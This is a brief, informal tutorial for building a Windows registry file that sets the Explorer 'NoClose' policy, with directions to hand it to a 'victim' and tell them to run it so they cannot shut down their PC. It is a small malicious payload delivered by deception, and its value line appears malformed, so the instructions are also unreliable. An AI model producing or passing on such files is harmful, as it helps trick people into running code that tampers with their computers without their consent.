1]Open Notepad & Paste

2]Regedit 4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"NoClose"="DWORD:1"

3]then Save as *.reg and give reg file to victim and say to run it
4]if victim run this reg he will not b able to close his pc
